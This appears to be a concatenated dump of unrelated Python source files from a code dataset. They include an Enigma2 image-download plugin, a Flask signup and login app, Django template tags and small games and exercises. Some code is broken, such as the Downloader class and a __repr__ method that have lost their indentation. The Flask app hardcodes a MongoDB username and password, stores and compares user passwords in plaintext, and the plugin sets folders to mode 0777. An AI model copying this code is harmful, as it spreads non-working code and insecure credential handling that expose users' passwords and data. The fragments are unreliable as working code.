                self.session.open(makeSelectTelnet, runDownload, self.imageurl, self.imagesize, console=True)

    def checkmountDownloadPath(self, path):
        """Return True when *path* is a mounted /media location with at
        least 60 MB free; shows an error dialog and returns False otherwise.
        (Near-duplicate of SelectDownloadLocation.checkmountDownloadPath,
        plus the free-space check.)"""
        if path is None:
            self.session.open(ScreenBox, _('nothing entered'), ScreenBox.TYPE_ERROR)
            return False
        elif freespace() < 60:
            self.session.open(ScreenBox, _('Free space is less than 60MB,please choose another download location,or delete files from storage device'), ScreenBox.TYPE_ERROR)
            return False
        else:
            sp = []
            sp = path.split('/')
            print sp
            if len(sp) > 1:
                if sp[1] != 'media':
                    # NOTE(review): here mounted_string is used as a %-format
                    # string, but as plain concatenation below and in
                    # SelectDownloadLocation -- confirm which is correct.
                    self.session.open(ScreenBox, mounted_string % path, ScreenBox.TYPE_ERROR)
                    return False
            mounted = False
            self.swappable = False
            sp2 = []
            f = open('/proc/mounts', 'r')
            m = f.readline()
            while m and not mounted:
                # NOTE(review): 'is not -1' only works because CPython caches
                # small ints; this should be '!= -1'.
                if m.find('/%s/%s' % (sp[1], sp[2])) is not -1:
                    mounted = True
                    print m
                    sp2 = m.split(' ')
                    print sp2
                    if sp2[2].startswith('ext') or sp2[2].endswith('fat'):
                        print '[stFlash] swappable'
                        self.swappable = True
                m = f.readline()
            f.close()
            if not mounted:
                self.session.open(ScreenBox, mounted_string + str(path), ScreenBox.TYPE_ERROR)
                return False
            # Make the configured folder world-writable (0777) if it exists.
            if os.path.exists(config.plugins.ImageDownLoader2.Downloadlocation.value):
                try:
                    os.chmod(config.plugins.ImageDownLoader2.Downloadlocation.value, 511)
                except:
                    pass
            return True
        return

    def go(self):
        """OK handler: dispatch on the selected menu entry id.
        NOTE(review): the 'settings' and 'console' branches are unreachable
        with the menu built in __init__ (only Download / Downloadlocation /
        files entries exist)."""
        current = self['menu'].getCurrent()
        if current:
            currentEntry = current[0]
            if self.menu == 0:
                if currentEntry == 'settings':
                    self.session.openWithCallback(self.updateSwap, SelectSetting)
                if currentEntry == 'Download':
                    if not self.fnameexists() == True:
                        self.session.openWithCallback(self.callMyMsg, ScreenBox, _('You selected to download:\n' + self.imageurl + '\ncontinue ?'), ScreenBox.TYPE_YESNO)
                    else:
                        self.session.openWithCallback(self.callMyMsg, ScreenBox, _('The file already exists,\n' + 'overwrite ?'), ScreenBox.TYPE_YESNO)
                if currentEntry == 'console':
                    if not self.fnameexists() == True:
                        self.session.openWithCallback(self.callMyMsg2, ScreenBox, _('You selected to download ' + self.imageurl + ',continue?'), ScreenBox.TYPE_YESNO)
                    else:
                        self.session.openWithCallback(self.callMyMsg2, ScreenBox, _('The file aleady exists ' + ',overwrite?'), ScreenBox.TYPE_YESNO)
                if currentEntry == 'files':
                    self.session.open(DownloadedFiles)
                elif currentEntry == 'Downloadlocation':
                    self.session.openWithCallback(self.Downloadlocation_choosen, SelectDownloadLocation)

    def updateSwap(self, retval):
        self['swapsize'].setText(''.join(config.plugins.ImageDownLoader2.swap.value + ' MB'))

    def Downloadlocation_choosen(self, option):
        """SelectDownloadLocation callback: persist the chosen folder (when
        one was returned) and make sure it exists."""
        self.updateTarget()
        if option is not None:
            config.plugins.ImageDownLoader2.Downloadlocation.value = str(option[1])
            config.plugins.ImageDownLoader2.Downloadlocation.save()
            config.plugins.ImageDownLoader2.save()
            config.save()
        self.createDownloadfolders()
        return

    def createDownloadfolders(self):
        """Create the download directory, re-opening the location chooser
        when the destination is not writeable."""
        self.Downloadpath = getDownloadPath()
        try:
            if os_path.exists(self.Downloadpath) == False:
                makedirs(self.Downloadpath)
        except OSError:
            self.session.openWithCallback(self.goagaintoDownloadlocation, ScreenBox, _('Sorry, your Download destination is not writeable.\n\nPlease choose another one.'), ScreenBox.TYPE_ERROR)

    def goagaintoDownloadlocation(self, retval):
        self.session.openWithCallback(self.Downloadlocation_choosen, SelectDownloadLocation)

    def updateTarget(self):
        """Refresh the 'target' label with the location and free space."""
        fspace = str(freespace()) + 'MB'
        self['target'].setText(''.join(config.plugins.ImageDownLoader2.Downloadlocation.value + ' Freespace:' + fspace))

    def DownloadDone(self, retval = None):
        # NOTE(review): self.session.open() is called without a screen class
        # and would raise; confirm the intended follow-up screen.
        if retval is False:
            self.session.open(ScreenBox, _(''), ScreenBox.TYPE_ERROR, timeout=10)
        elif config.plugins.ImageDownLoader2.update.value == True:
            self.session.open()
        else:
            self.cancel()

    def cancel(self, result = None):
        self.close(None)
        return

    def runUpgrade(self, result):
        # NOTE(review): same missing-argument self.session.open() as above.
        if result:
            self.session.open()
class Downloader(Screen):
def __init__(self, session, url = None, target = None, path = None):
self.session = session
if dwidth == 1280:
skin = '/usr/lib/enigma2/python/Plugins/Extensions/SatVenusPanel/Skin/dlHD.xml'
else:
skin = '/usr/lib/enigma2/python/Plugins/Extensions/SatVenusPanel/Skin/dlFHD.xml'
f = open(skin, 'r')
self.skin = f.read()
f.close()
Screen.__init__(self, session)
print url
self.url = url
self.target = target
self.path = path
self.nfifile = target
self['info'] = Label('')
self['info2'] = Label('')
self['progress'] = ProgressBar()
self.aborted = False
self['progress'].setRange((0, 100))
self['progress'].setValue(0)
self.onLayoutFinish.append(self.startDownload)
self['actions'] = ActionMap(['OkCancelActions'], {'cancel': self.cancel}, -1)
self.connection = None
return
def startDownload(self):
from Tools.Downloader import downloadWithProgress
info = ' Downloading :\n %s ' % self.url
self['info2'].setText(info)
self.downloader = downloadWithProgress(self.url, self.target)
self.downloader.addProgress(self.progress)
self.downloader.start().addCallback(self.responseCompleted).addErrback(self.responseFailed)
def progress(self, current, total):
p = int(100 * (float(current) / float(total)))
self['progress'].setValue(p)
info = _('Downloading') + ' ' + '%d of %d kBytes' % (current / 1024, total / 1024)
info = 'Downloading ... ' + str(p) + '%'
self['info'].setText(info)
self.setTitle(info)
self.last_recvbytes = current
def responseCompleted(self, string = ''):
if self.aborted:
self.finish(aborted=True)
else:
info = 'The image downloaded successfully !'
self['info2'].setText(info)
if self.target.endswith('.zip'):
info = 'The image downloaded successfully !'
self.session.openWithCallback(self.close, ScreenBox, _(info), type=ScreenBox.TYPE_INFO, timeout=3)
elif self.target.endswith('.tar.xz'):
info = 'The image downloaded successfully !'
self.session.openWithCallback(self.close, ScreenBox, _(info), type=ScreenBox.TYPE_INFO, timeout=3)
elif self.target.endswith('.nfi'):
info = 'The image downloaded successfully !'
self.session.openWithCallback(self.close, ScreenBox, _(info), type=ScreenBox.TYPE_INFO, timeout=3)
else:
self.close
return
    def responseFailed(self, failure_instance = None, error_message = ''):
        """Show the download failure reason in the UI and a timed message box.

        If no explicit error_message is given, it is taken from the Twisted
        failure instance.
        """
        self.error_message = error_message
        if error_message == '' and failure_instance is not None:
            self.error_message = failure_instance.getErrorMessage()
        info = 'Download failed ' + self.error_message
        self['info2'].setText(info)
        self.session.openWithCallback(self.close, ScreenBox, _(info), timeout=3, close_on_any_key=True)
        return
    def cancel(self):
        """Ask for confirmation before aborting a running download.

        If no downloader exists yet, just mark aborted and close immediately.
        """
        if self.downloader is not None:
            info = 'You are going to abort download, are you sure ?'
            self.session.openWithCallback(self.abort, ScreenBox, _(info), type=ScreenBox.TYPE_YESNO)
        else:
            self.aborted = True
            self.close()
        return
def abort(self, result = None):
if result:
self.downloader.stop
self.aborted = True
self.close()
    def exit(self, result = None):
        # Unconditionally close this screen (callback-compatible signature).
        self.close()
|
23,449 | d19195bdce65a7caa5fc6822bec2d593a3ccbbd1 | class Person(object):
 def __init__(self,firstname,lastname):
  # Given name and family name; __cmp__ and __repr__ are derived from these.
  self.first=firstname
  self.last=lastname
 def __cmp__(self,other):
  # Order by (last, first). NOTE(review): __cmp__ and the cmp() builtin are
  # Python 2 only; on Python 3 this class has no ordering.
  return cmp((self.last,self.first),(other.last,other.first))
def __repr__(self):
return "%s %s" %(self.first,self.last)
# Demo: build one Person and print it (uses __repr__ via print()).
actors=Person('Eric','Idle')
print(actors)
23,450 | d165dbd1bc22c6d3f1948b10b69f795baa8ab4a0 | from django import template
from template_utils.templatetags.generic_content import GenericContentNode
register = template.Library()
class LatestFeaturedNode(GenericContentNode):
    """GenericContentNode restricted to objects flagged as featured."""
    def _get_query_set(self):
        # Narrow the inherited queryset to featured items only.
        return self.query_set.filter(featured__exact=True)
def do_featured_entries(parser, token):
    """
    Retrieve the latest ``num`` featured entries and store them in a
    specified context variable.

    Syntax::

        {% get_featured_entries [num] as [varname] %}

    Example::

        {% get_featured_entries 5 as featured_entries %}
    """
    pieces = token.contents.split()
    if len(pieces) != 4:
        raise template.TemplateSyntaxError("'%s' tag takes three arguments" % pieces[0])
    _, num, keyword, varname = pieces
    if keyword != 'as':
        raise template.TemplateSyntaxError("second argument to '%s' tag must be 'as'" % pieces[0])
    return LatestFeaturedNode('coltrane.entry', num, varname)
def do_featured_entry(parser, token):
    """
    Retrieve the latest featured Entry and store it in a specified
    context variable.

    Syntax::

        {% get_featured_entry as [varname] %}

    Example::

        {% get_featured_entry as featured_entry %}
    """
    pieces = token.contents.split()
    if len(pieces) != 3:
        raise template.TemplateSyntaxError("'%s' tag takes two arguments" % pieces[0])
    _, keyword, varname = pieces
    if keyword != 'as':
        raise template.TemplateSyntaxError("first argument to '%s' tag must be 'as'" % pieces[0])
    return LatestFeaturedNode('coltrane.entry', 1, varname)
# Expose both tags to the Django template engine.
register.tag('get_featured_entries', do_featured_entries)
register.tag('get_featured_entry', do_featured_entry)
|
23,451 | 69e84c0c0fc69eed0acccfe10eb8569b5b25642b | #coding:utf-8
from output_helper import print_banner,common_print,time_print,color_print
from modules import enable_module_list
import sys
def main():
    """Print the banner, then run every enabled module against the picture
    whose path is given as the first command-line argument.
    """
    print_banner()
    if len(sys.argv) < 2:
        color_print("please input the path of the picture as the first argument")
        return
    filename = sys.argv[1]
    # Bug fix: the original leaked the file handle via open(...).read();
    # 'with' guarantees it is closed. Also renames the local that shadowed
    # the builtin `file` (Python 2) / read more clearly as `data`.
    with open(filename, 'rb') as fh:
        data = fh.read()
    for Module in enable_module_list:
        module = Module()
        module.run(filename, data)
# Script entry point.
if __name__ == '__main__':
    main()
|
23,452 | 500e8c6672b643283c505efc56416328bc0db6c0 | from flask import Flask, render_template, request, redirect, url_for
import requests
import pymongo
app = Flask(__name__)
# Base endpoints of the external feedback API.
Feedback_URL = 'https://test-api-615.herokuapp.com/api/feedback'
API_URL = Feedback_URL + '/test'
# Bug fix: the original performed `res = requests.get(API_URL)` here at import
# time; the response was never used, so the dead (and slow/fragile) network
# call at module load is removed.
Headers = {'Content-Type': 'application/json'}
### assume the flask expt app below is made from a template ###
@app.route('/')
def index():
    """Serve the experiment landing page."""
    return render_template('index.html')
@app.route('/submit', methods=['POST'])
def submit():
    """Handle the feedback form: validate the user ID, reject duplicates,
    then POST the submission to the feedback API.
    """
    if request.method == 'POST':
        userID = request.form['userid']
        # need to store slider value
        sliderVal = str(request.form['myRange'])
        if userID == '':
            return render_template('index.html',
                                   message='Please enter User ID')
        dataToPOST = {
            "userID": userID,
            "sliderVal": sliderVal
        }
        # Return err message if userID already exists.
        # Improvement: collect existing IDs into a set (O(1) membership)
        # instead of appending to a list and scanning it.
        existing_ids = {item["userID"] for item in requests.get(API_URL).json()}
        if userID in existing_ids:
            return render_template('index.html',
                                   message='UserID already exists')
        response = requests.post(API_URL, json=dataToPOST, headers=Headers)
        return render_template('thankyou.html',
                               message='Submission details: {}'.
                               format(str(response.json())))
# admin_mongodburi = "mongodb+srv://admin:p123456@democluster-ee3kz"\
# ".mongodb.net/demoDatabase?retryWrites=true&w=majority"
# admin_client = pymongo.MongoClient(admin_mongodburi)
# admin_db = admin_client.demoDatabase
# SECURITY NOTE(review): database credentials are hard-coded in source;
# move them to environment variables / config before deploying.
admin_mongodburi = "mongodb://user:p123456@ds263248.mlab.com:63248/heroku_5qkz777p"
admin_client = pymongo.MongoClient(admin_mongodburi)
admin_db = admin_client["heroku_5qkz777p"]
@app.route("/signup")
def signup():
return render_template('signup.html')
@app.route("/signup/success", methods=["POST"])
def signup_success():
if request.method == 'POST':
username = request.form['usr_name']
password = request.form['pwd']
Dest_URL = Feedback_URL + '/credentials'
dataGOT = requests.get(Dest_URL).json()
all_usernames = []
for item in dataGOT:
all_usernames.append(item["username"])
# safeguarding repetition of usernames
if username in all_usernames:
return render_template('signup.html',
message='Username already exists. Please enter a new one.',
should_login=False)
else:
admin_db.command("createUser", username,
pwd=password, roles=["restricted"])
dataToPOST = {
"username": username,
"password": password
}
sent = requests.post(Dest_URL, json=dataToPOST, headers=Headers)
return render_template('signup.html',
message='User ({}) created.'.format(username),
should_login=True)
@app.route("/signup/success/redirect", methods=["POST"])
def signup_redirect():
if request.method == 'POST':
return redirect(url_for('login'))
@app.route("/login")
def login():
return render_template('login.html')
@app.route("/researcher", methods=['POST'])
def researcher():
if request.method == 'POST':
username = request.form['usr_name']
password = request.form['pwd']
# # using mongoclient doens't give you the password
# # NEED TO LOOK AT IF THE HASH OF PASSWORD MATCHES WITH THE CREDENTIALS
# # for now, we will use a collection on mongodb to store credentials
# users = admin_db.command('usersInfo', showCredentials=True)
Dest_URL = Feedback_URL + '/credentials'
dataGOT = requests.get(Dest_URL).json()
for item in dataGOT:
if item['username'] == username:
if item['password'] == password:
return render_template('researcher.html', usr=username)
else:
return render_template('login.html',
message='Incorrect Password. Please try again.')
return render_template('login.html', message='User does not exist')
@app.route("/researcher/submit", methods=['POST'])
def researcher_submit():
if request.method == 'POST':
col_name = request.form['col_name']
username = request.form['usr']
# need to safeguard collection already exists error
admin_db.create_collection(col_name)
role_name = "use-" + col_name
admin_db.command("createRole", role_name,
privileges=[{
'resource': { 'db': 'heroku_5qkz777p', 'collection': col_name },
'actions': ['find', 'insert', 'remove', 'update' ]}],
roles=[])
# admin_db.command("updateUser", username, roles=[role_name])
# print(admin_db.command("usersInfo", showPrivileges=True))
admin_db.command("grantRolesToUser", username, roles=[{'role': role_name, 'db': 'heroku_5qkz777p'}])
return render_template('researcher.html', usr=username,
message='Collection ({}) created.'.format(col_name))
# Run the Flask development server when executed directly.
if __name__ == '__main__':
    app.run()

# test
23,453 | 729f00d1cebc55eff99121a7a3c2a16dfd6f1d2e | import pygame
import sys
import time
import random
from pygame.locals import *
WINDOW_WIDTH=800
WINDOW_HEIGHT=600
GRID_SIZE = 20
# NOTE(review): true division yields floats (40.0, 30.0); use // if integer
# cell counts are expected by later code.
GRID_WIDTH = WINDOW_WIDTH / GRID_SIZE
GRID_HEIGHT = WINDOW_HEIGHT / GRID_SIZE
# Colours (RGB) and unit direction vectors on the grid.
WHITE=(255, 255, 255)
GREEN = (0, 50, 0)
UP = (0, -1)
DOWN = (0, 1)
LEFT = (-1, 0)
RIGHT = (1, 0)
class Python(object):
    """The snake: a list of grid positions plus a travel direction.

    Bug fixes versus the original: __init__ called the misspelled
    `self.creat()` and the undefined name `Green`; move() read the misspelled
    `self.postions` and contained unbalanced parentheses with a misplaced `%`.
    """

    def __init__(self):
        self.create()
        self.color = GREEN

    def create(self):
        """(Re)spawn the snake at the window centre with a random direction."""
        self.length = 2
        self.positions = [((WINDOW_WIDTH / 2), (WINDOW_HEIGHT / 2))]
        self.direction = random.choice([UP, DOWN, LEFT, RIGHT])

    def control(self, xy):
        """Change direction, unless `xy` is the exact reverse of the current one."""
        if (xy[0] * -1, xy[1] * -1) == self.direction:
            return
        else:
            self.direction = xy

    def move(self):
        """Compute the next head cell, wrapping around the window edges.

        NOTE(review): `new` is computed but not yet appended to positions —
        the original appears unfinished here.
        """
        cur = self.positions[0]
        x, y = self.direction
        # Wrap the *sum* around the window (the original applied % only to
        # the step term and did not parse at all).
        new = ((cur[0] + x * GRID_SIZE) % WINDOW_WIDTH,
               (cur[1] + y * GRID_SIZE) % WINDOW_HEIGHT)
if __name__ == '__main__':
    # Set up the window and drawing surface.
    pygame.init()
    window = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT), 0, 32)
    pygame.display.set_caption('Python Game')
    surface = pygame.Surface(window.get_size())
    surface = surface.convert()
    surface.fill(WHITE)
    clock = pygame.time.Clock()
    # Bug fix: pygame has no `key_set_Repeat`; the API is pygame.key.set_repeat.
    pygame.key.set_repeat(1, 40)
    window.blit(surface, (0, 0))
23,454 | f325bafcbecba73c786c095e56b5d91c70d5d579 | import onix.nax as nax
import pathlib
# Locate the simulation output folder next to this script.
path1 = pathlib.Path(__file__).parent.absolute() / '5MWe-reactor-simulation_output-folder'
NAX_cell = 'Sample'

# Low/high burnup window per cycle, and the midpoint of each window.
burnup_list_low = [0.6, 0.23, 0.22, 0.22, 0.23]
burnup_list_high = [0.699, 0.33, 0.31, 0.31, 0.32]
burnup_mid = []
for low, high in zip(burnup_list_low, burnup_list_high):
    burnup_mid.append((low + high) / 2)

pow_unit_cell = 6.00000E-05  # unit-cell power, in MW
ihm = 118.75970682995882 * 1E-3  # initial heavy metal mass (units per upstream convention)

# Irradiation time per cycle: days = burnup * IHM / power.
day_list = [bu * ihm / pow_unit_cell for bu in burnup_mid]
# Assemble one (batch, irradiation-days) tuple per cycle and run the review.
batch1 = nax.Batch(path1)
operation_history = [(batch1, day) for day in day_list]
nax.review_all_ratio_candidates(NAX_cell, operation_history, path1, 1E-3)
23,455 | 8b950ac053a6a47f6b3f708640eb6ef70305815d | #Week 3 Zandbergen
#6.3
def first(word):
    """Return the leading character of *word*."""
    head = word[0]
    return head

print(first('Hello'))
def last(word):
    """Return the final character of *word*."""
    tail = word[-1]
    return tail

print(last('December'))
def middle(word):
    """Return *word* with its first and last characters removed."""
    trimmed = word[1:-1]
    return trimmed

print(middle('Tomorrow'))
#1
#Call middle with a string of two letters - returns the empty string ''
print(middle('hi'))
#Call middle with a string of one letter - returns the empty string ''
print(middle('h'))
#Call middle with a single space - also returns the empty string ''
print(middle(' '))
#Call middle
print(middle('Hello'))
#Call First
print(first('Hello'))
#Call Last
print(last('Hello'))
#2
def is_palindrome(word):
    """Return True if *word* reads the same forwards and backwards."""
    # Idiom fix: return the comparison directly instead of if/else True/False.
    return word == word[::-1]

print(is_palindrome('redivider'))
print(is_palindrome('noon'))
print(is_palindrome('October'))
|
23,456 | 6075d5a9e4e9011aac5189ea43f5641edb3fa075 | import os
import pygame
import random
class Mirror:
    """A mirror that slides in from a screen edge, waits, slides out, and can
    be destroyed (blinking while destroyed).

    Animation is driven by `game.frame`; (x1, y1) is the off-screen start
    position and (x2, y2) the fully-shown position for the chosen edge.
    """

    SCALE = 3

    # Lifecycle states.
    SHOWING = 0
    WAITING = 1
    HIDING = 2
    DESTROYED = 3

    SHOW_ANIMATION_DURATION = 25     # frames (scaled down by difficulty)
    HIDE_ANIMATION_DURATION = 10     # frames
    DESTROY_ANIMATION_FREQUENCY = 4  # blink toggle period, frames

    # NOTE: evaluated at class-definition time — importing this module
    # requires minigames/mirrors/images to exist.
    IMAGES = [os.path.join("minigames/mirrors/images", f) for f in os.listdir("minigames/mirrors/images") if f.startswith("mirror") and os.path.isfile(os.path.join("minigames/mirrors/images", f))]
    # Rotation per spawn edge: top, left, bottom, right respectively.
    ANGLES = [180, 270, 0, 90]

    def __init__(self, game, screen_size, duration, mirrors):
        self.game = game
        # Faster show animation at higher difficulty, floored at 10 frames.
        self.show_animation_duration = max(Mirror.SHOW_ANIMATION_DURATION / (self.game.difficulty + 1), 10)
        self.spawn_start_frame = self.game.frame
        self.animation_start_frame = self.spawn_start_frame
        self.destroy_start_frame = 0
        self.status = Mirror.SHOWING
        self.blink = False
        self.duration = duration
        self.angle = random.choice(Mirror.ANGLES)
        self.position = (0, 0)
        self.gfx = pygame.image.load(random.choice(Mirror.IMAGES))
        self.gfx = pygame.transform.scale(self.gfx, (self.gfx.get_width() * Mirror.SCALE, self.gfx.get_height() * Mirror.SCALE))
        self.gfx = pygame.transform.rotate(self.gfx, self.angle)
        screen_width, screen_height = screen_size
        # Only mirrors on the same edge constrain our spawn position.
        mirrors = filter(lambda m: m.angle == self.angle, mirrors)
        self._initial_position = None
        # Pop from Top
        if self.angle == 180:
            excluded_ranges = [range(m.x1, m.x1 + 2 * m.gfx.get_width()) for m in mirrors]
            self.x1 = self.random_position(self.gfx.get_width(), screen_width - self.gfx.get_width(), excluded_ranges)
            self.x2 = self.x1
            self.y1 = -self.gfx.get_height()
            self.y2 = 0
        # Pop from Right
        elif self.angle == 90:
            excluded_ranges = [range(m.y1, m.y1 + 2 * m.gfx.get_height()) for m in mirrors]
            self.x1 = screen_width
            self.x2 = screen_width - self.gfx.get_width()
            self.y1 = self.random_position(self.gfx.get_height(), screen_height - self.gfx.get_height(), excluded_ranges)
            self.y2 = self.y1
        # Pop from Bottom
        elif self.angle == 0:
            excluded_ranges = [range(m.x1, m.x1 + 2 * m.gfx.get_width()) for m in mirrors]
            self.x1 = self.random_position(self.gfx.get_width(), screen_width - self.gfx.get_width(), excluded_ranges)
            self.x2 = self.x1
            self.y1 = screen_height
            self.y2 = self.y1 - self.gfx.get_height()
        # Pop from Left
        elif self.angle == 270:
            excluded_ranges = [range(m.y1, m.y1 + 2 * m.gfx.get_height()) for m in mirrors]
            self.x1 = -self.gfx.get_width()
            self.x2 = 0
            self.y1 = self.random_position(self.gfx.get_height(), screen_height - self.gfx.get_height(), excluded_ranges)
            self.y2 = self.y1

    def random_position(self, min, max, excluded_ranges):
        """Pick a random coordinate in [min, max) avoiding the excluded ranges.

        Bug fix: the original iterated a `range` object while `del`eting from
        it — a TypeError on Python 3, and it skipped elements after each
        deletion on Python 2. Build the filtered candidate list instead.
        """
        candidates = [p for p in range(min, max)
                      if not any(p in er for er in excluded_ranges)]
        return random.choice(candidates)

    def is_visible(self):
        """True while the show/wait/hide sequence has not fully elapsed."""
        return self.game.frame - self.spawn_start_frame < self.show_animation_duration + self.duration + Mirror.HIDE_ANIMATION_DURATION

    def destroy(self):
        """Mark the mirror destroyed (it will blink until it disappears)."""
        # NOTE(review): this records elapsed_ms while the rest of the class
        # tracks frames — confirm the intended time base.
        self.destroy_start_frame = self.game.elapsed_ms
        self.status = Mirror.DESTROYED

    def display(self, screen):
        """Advance the animation state machine and blit the mirror."""
        if self.is_visible():
            x1 = 0
            x2 = 0
            y1 = 0
            y2 = 0
            d = 1
            # Phase 1: sliding in from the edge.
            if self.game.frame - self.spawn_start_frame < self.show_animation_duration:
                x1 = self.x1
                x2 = self.x2
                y1 = self.y1
                y2 = self.y2
                d = self.show_animation_duration
            # Phase 2: fully shown, waiting.
            elif self.show_animation_duration <= self.game.frame - self.spawn_start_frame < self.show_animation_duration + self.duration:
                if self.status == Mirror.SHOWING:
                    self.animation_start_frame = self.game.frame
                    self.status = Mirror.WAITING
                x1 = self.x2
                x2 = self.x2
                y1 = self.y2
                y2 = self.y2
                d = self.duration
            # Phase 3: sliding back out.
            else:
                if self.status == Mirror.WAITING:
                    self.animation_start_frame = self.game.frame
                    self.status = Mirror.HIDING
                x1 = self.x2
                x2 = self.x1
                y1 = self.y2
                y2 = self.y1
                d = Mirror.HIDE_ANIMATION_DURATION
            x = int(self.smooth_step(x1, x2, self.game.frame - self.animation_start_frame, d) + 0.5)
            y = int(self.smooth_step(y1, y2, self.game.frame - self.animation_start_frame, d) + 0.5)
            self.position = (x, y)
            if self._initial_position is None:
                self._initial_position = self.position
            # Toggle the blink flag while destroyed.
            if self.game.frame % Mirror.DESTROY_ANIMATION_FREQUENCY == 0:
                self.blink = not self.blink
            if self.status != Mirror.DESTROYED or not self.blink:
                screen.blit(self.gfx, self.position)

    def smooth_step(self, p1, p2, t, d):
        """Smoothstep interpolation between p1 and p2 at time t of duration d."""
        if p1 == p2:
            return p1
        x = (float(t) / float(d))
        x = (x * x * (3 - 2 * x))
        return (p2 * x) + (p1 * (1 - x))
23,457 | 404320c58e18f7454ab2697240f5bb29ac627670 | import os
from fxpt.fx_prefsaver import prefsaver, serializers
from com import REF_ROOT_VAR_NAME
ROOTS_CFG_OPT_VAR = 'fx_refsystem_roots'
ROOTS_DEFAULT_VALUE = {'': True}
# noinspection PyAttributeOutsideInit
class RootsCfgHandler(object):
    """Persist and sanitise the dict of reference roots ({root: isActive}).

    Invariant enforced by cleanupRootsDict: the empty-string root is always
    present and exactly one root is active at any time.
    """
    def __init__(self):
        # Current roots dict; populated by loadCfg().
        self.roots = None
        self.initCfg()
        self.loadCfg()
    def initCfg(self):
        # Bind the 'roots' variable to an optionVar-backed pref saver.
        self.prefSaver = prefsaver.PrefSaver(serializers.SerializerOptVar(ROOTS_CFG_OPT_VAR))
        # self.prefSaver = PrefSaver.PrefSaver(Serializers.SerializerFileJson(os.path.dirname(__file__) + '/test.cfg'))
        self.prefSaver.addVariable('roots', self.getterRoots, self.setterRoots, self.getDefaultRootsValue())
    def getterRoots(self):
        # Accessor used by the pref saver.
        return self.roots
    def setterRoots(self, value):
        # Mutator used by the pref saver.
        self.roots = value
    # noinspection PyMethodMayBeStatic
    def getDefaultRootsValue(self):
        # Fresh copy so callers cannot mutate the module-level default.
        return dict(ROOTS_DEFAULT_VALUE)
    def loadCfg(self):
        """Load prefs, falling back to the default dict on any failure."""
        # noinspection PyBroadException
        try:
            self.prefSaver.loadPrefs()
        except Exception:
            self.roots = self.getDefaultRootsValue()
            return
        self.cleanupRootsDict()
    def cleanupRootsDict(self):
        """Repair the roots dict so exactly one root (or '') is active."""
        if len(self.roots) < 1:
            self.roots = self.getDefaultRootsValue()
            return
        if '' not in self.roots:
            self.roots = self.getDefaultRootsValue()
            return
        activeCount = len([v for v in self.roots.values() if v])
        if activeCount == 1:
            return
        elif activeCount < 1:
            # Nothing active: fall back to the default '' root.
            self.roots[''] = True
            return
        else:
            # More than one active: keep only '' active.
            for root in self.roots:
                if root == '':
                    self.roots[root] = True
                else:
                    self.roots[root] = False
    def saveCfg(self):
        """Sanitise, persist, and mirror the active root into the environment."""
        self.cleanupRootsDict()
        self.prefSaver.savePrefs()
        self.setEnvVar()
    def setEnvVar(self):
        # Expose the active root to child processes via the env var.
        os.environ[REF_ROOT_VAR_NAME] = self.getCurrentRoot()
    def getCurrentRoot(self):
        """Return the single active root (reloads the cfg first).

        NOTE(review): `assert False` is stripped under `python -O`; a raised
        exception would be more robust if this path is ever reachable.
        """
        self.loadCfg()
        for root, isActive in self.roots.items():
            if isActive:
                return root
        assert False, 'no active root in cfg.'
    def getRoots(self):
        # Reload from prefs each call, then return the dict.
        self.loadCfg()
        return self.roots
|
def search(N, target):
    """Print a dict of every ordered index pair (i, j), i == j allowed,
    such that N[i] + N[j] == target, numbered from 1 in discovery order.
    """
    solutions = {}
    hits = 0
    for i, a in enumerate(N):
        for j, b in enumerate(N):
            if a + b == target:
                hits += 1
                solutions[hits] = [i, j]
    print(solutions)
# Demo run: prints {1: [1, 1], 2: [2, 3], 3: [3, 2]} for this input.
N = [4, 10, 6, 14, 18, 19, 20]
target = 20
search(N, target)
|
23,459 | d4421b761fb556ead8dd4e95c894e848d0530807 | # Italian translations
import move_simple
def ferma():
    # Italian alias for move_simple.stop() ("stop").
    move_simple.stop()
def destra(t):
    # Italian alias for move_simple.right(t) ("right").
    move_simple.right(t)
def sinistra(t):
    # Italian alias for move_simple.left(t) ("left").
    move_simple.left(t)
def avanti(t):
    # Italian alias for move_simple.forward(t) ("forward").
    move_simple.forward(t)
def indietro(t):
    # Italian alias for move_simple.backward(t) ("backward").
    move_simple.backward(t)
|
23,460 | f6cef4b649d54717ce826236eb57859748e4fdac | # Copyright (c) 2014, Max Zwiessele, James Hensman
# Licensed under the BSD 3-clause license (see LICENSE.txt)
from paramz import Parameterized
from .priorizable import Priorizable
import logging
logger = logging.getLogger("parameters changed meta")
class Parameterized(Parameterized, Priorizable):
    """
    Parameterized class

    Say m is a handle to a parameterized class.

    Printing parameters:
        - print m: prints a nice summary over all parameters
        - print m.name: prints details for param with name 'name'
        - print m[regexp]: prints details for all the parameters
          which match (!) regexp
        - print m['']: prints details for all parameters

    Fields:
        Name: The name of the param, can be renamed!
        Value: Shape or value, if one-valued
        Constrain: constraint of the param, curly "{c}" brackets indicate
        some parameters are constrained by c. See detailed print
        to get exact constraints.
        Tied_to: which paramter it is tied to.

    Getting and setting parameters:
        Set all values in param to one:
            m.name.to.param = 1

    Handling of constraining, fixing and tieing parameters:
        You can constrain parameters by calling the constrain on the param itself, e.g:
        - m.name[:,1].constrain_positive()
        - m.name[0].tie_to(m.name[1])

        Fixing parameters will fix them to the value they are right now. If you change
        the parameters value, the param will be fixed to the new value!

        If you want to operate on all parameters use m[''] to wildcard select all paramters
        and concatenate them. Printing m[''] will result in printing of all parameters in detail.
    """
    # All behaviour is inherited: the paramz base class supplies the parameter
    # machinery and Priorizable mixes in prior support; nothing is overridden.
    pass
|
23,461 | a4ad2358c75ea199593746a69aebdf89510a47e1 | from collections import Counter
# HackerRank "Collections.Counter": total revenue from selling shoes while
# stock (per size) lasts. Input: count line (unused), stock sizes, number of
# customers, then one "size price" line per customer.
input()  # number of shoes — implied by the stock line, so unused
shoesCounter = Counter(map(int, input().split(' ')))
total = 0
for _ in range(int(input())):
    size, price = map(int, input().split(' '))
    # Idiom fixes: Counter returns 0 for missing keys, so the redundant
    # `size in ...keys()` check and the empty `else: pass` are dropped;
    # `map(int, ...)` replaces `map(lambda x: int(x), ...)`.
    if shoesCounter[size] > 0:
        total += price
        shoesCounter[size] -= 1
print(total)
|
23,462 | 2cdf8d79b3bba4212f8280690262738d11118329 | # coding=gbk
"""
作者:川川
时间:2021/8/24
群:970353786
"""
thisdict = {
"brand": "Ford",
"model": "Mustang",
"year": 1964
}
print(thisdict)
thisdict = {
"brand": "Ford",
"model": "Mustang",
"year": 1964
}
print(thisdict["brand"])
thisdict = {
"brand": "Ford",
"model": "Mustang",
"year": 1964,
"year": 2020
}
